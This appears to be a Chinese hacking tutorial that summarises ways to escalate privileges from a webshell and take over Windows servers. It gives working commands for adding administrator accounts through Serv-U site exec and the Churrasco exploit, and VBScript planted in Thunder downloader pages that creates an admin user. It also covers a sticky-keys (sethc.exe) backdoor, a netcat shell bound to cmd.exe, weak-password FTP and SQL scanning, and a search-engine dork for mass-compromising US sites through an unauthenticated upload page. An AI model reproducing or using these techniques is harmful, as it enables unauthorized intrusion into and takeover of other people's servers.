webshell提权总结

1.webshell提权之Serv-U添加数据法
找到Sserv-u的目录里的ServUDaemon.ini文件进行修改，添加一个有执行权限的用户。然后登陆ftp添加系统账号：quote site exec net user用户名密码 /add, quote site exec net localgroupadministrators 用户名 /add。这样就可以用添加的账号进行远程登陆。
注意：前提有webshell中有目录修改的权限。

2.webshell提权之本地提权法
上传aspx马到网站的更目录然后输入在浏览器中输入它的路径执行dos命令。
这是开3389端口命令，在服务里可看sc config termservice start= auto & net start termservice

3.webshell提权之端口定向法 用到的工具：FPipe.exe 和cmd.exe，

FPipe.exe参数设置：FPipe.exe的路径 -v -l 转发的端口 -r 43958 127.0.0.1 把这俩款工具上传到网站，然后执行:FPipe.exe的路径 -v -l 2345 -r 43958 127.0.0.1，

然后本机安装ser-u，在打开它， 在ser-u 服务器上点右键新建服务器，ip地址写服务器的ip地址，下一步，端口号写转发的端口号，下一步，ftp服务名称随便写，在下一步，用户名称写默认的serv-u的用户:LocalAdministrator，在下一步，密码也是默认管理员的:#l@$ak#.lk;0@P，在完成。如果接收成功就可以打开它了，这时就可以建立可执行的ftp用户进行提权啦，呵呵~！

4.webshell提权之churrasco提权法
用vip.asp马上传churrasco.exe，找到它的上传路径，然后在执行：churrasco.exe路径 “dos命令”。这样我们就可以添加系统账号进行登陆啦。忽忽 C:\Helps\churrasco.exe "net user koma 398129 /add"

题外话：连接时超出终端的解决办法：
解决终端超出了最大连接数的命令：mstsc /v:服务器IP:3389 /console
5.webshell提权之迅雷提权法 如果服务器安装了迅雷，我们就可以利用它来提权，当管理员下载文件时会自动创建一个我们新建的用户。呵呵，这种方法是要等的。有耐心的就慢慢等管理员去下载东西后在进去吧。忽忽。

找到迅雷安装目录里的这俩个文件，getAllurl.htm和geturl.htm，然后在最尾部添加如下vbs代码
<script language="VBScript">
Set vbs=CreateObject("Wscript.Shell")
vbs.run "cmd /c net user 用户名 密码 /add",0
vbs.run "cmd /c net localgroup administrators 用户名 /add",0
</script>

二. 乱七八糟拿服务器

1.利用S-U日抓上百服务器：21端口 先用工具扫FTP弱口令，然后登陆执行：append c:\windows\system32\net.exe,
quote site exec net.exe

如果显示：200 EXEC command successful (TID=33).
这时我们就可以添加系统用户进行登陆了。
可以用工具批量执行，免的手动麻烦。
2.SQL拿服务器新诀窍 扫SQL弱口令后发现执行不了命令，拒绝访问，像这样的就是
C:\>net user hack hack /add
拒绝访问。 但可以执行其他命令，利用它来开个shift后门，操作：用sql连接后执行：

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

这时我们登陆3389，出现登陆后按shift，即可出现对话框，接着点取消，在来到计算机管理这来建立用户提权，呵呵。这样就ok啦，，，。又一个服务器到手了，忽忽。
3.nc反弹拿服务器 首先看到 wscript.shell √ 命令行执行组件。可以执行命令。

这时找个可读可写的目录将nc.exe和cmd.exe上传上去。 然后到cmd命令执行那栏里把cmd路径写上去，接着执行：C:\RECYCLER\nc.exe -l -p 2345 -t -e C:\RECYCLER\cmd.exe
执行完毕后打开我们的dos,执行：telnet 服务器IP 110
说明：110时我们监听的端口。接着enter进入，这时就可以执行命令添加系统账号进行终端登陆了呵呵，完毕。

3.最新21端口入侵服务器

扫ftp弱口令，得到它的web目录，可写的话上传个asp马上去，上传命令：append 马的路径
然后连接上传的马，进行提权。时间有点晚了，快12点了，写的不是很详细。不懂的可以来问我。

4.批量入侵美国网站。
在搜索引擎中搜：inurl:inc_webblogmanager.asp
然后出现许多美国站，这时我们随便打开个网站在后面输入：
/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp

出现可上传的页面就可以啦

这时准备好我们的大马和小马

首先建立个asp后缀的文件夹，接着在这个文件家中上传我们的小马，然后找到小马的路径上传大马。这时连接大马就拿到了webshell。
接下来就时提权了，就不多说啦。忽忽
5.一次艰难的webshell提权

先上传cmd执行命令，发现不能创建用户，
在试试nc反弹，忽忽，没权限。

在试试修改ftp目录里的文件保存用户。55555，也不行额，没权限。
在试试端口定向法。哈哈，可以额，终于成功了，我们可执行用户试试。呵呵搞定。
然后来到dos下连接ftp。创建个管理员用户，ok，我们3389登陆上去，成功。
呵呵又搞定了一台服务器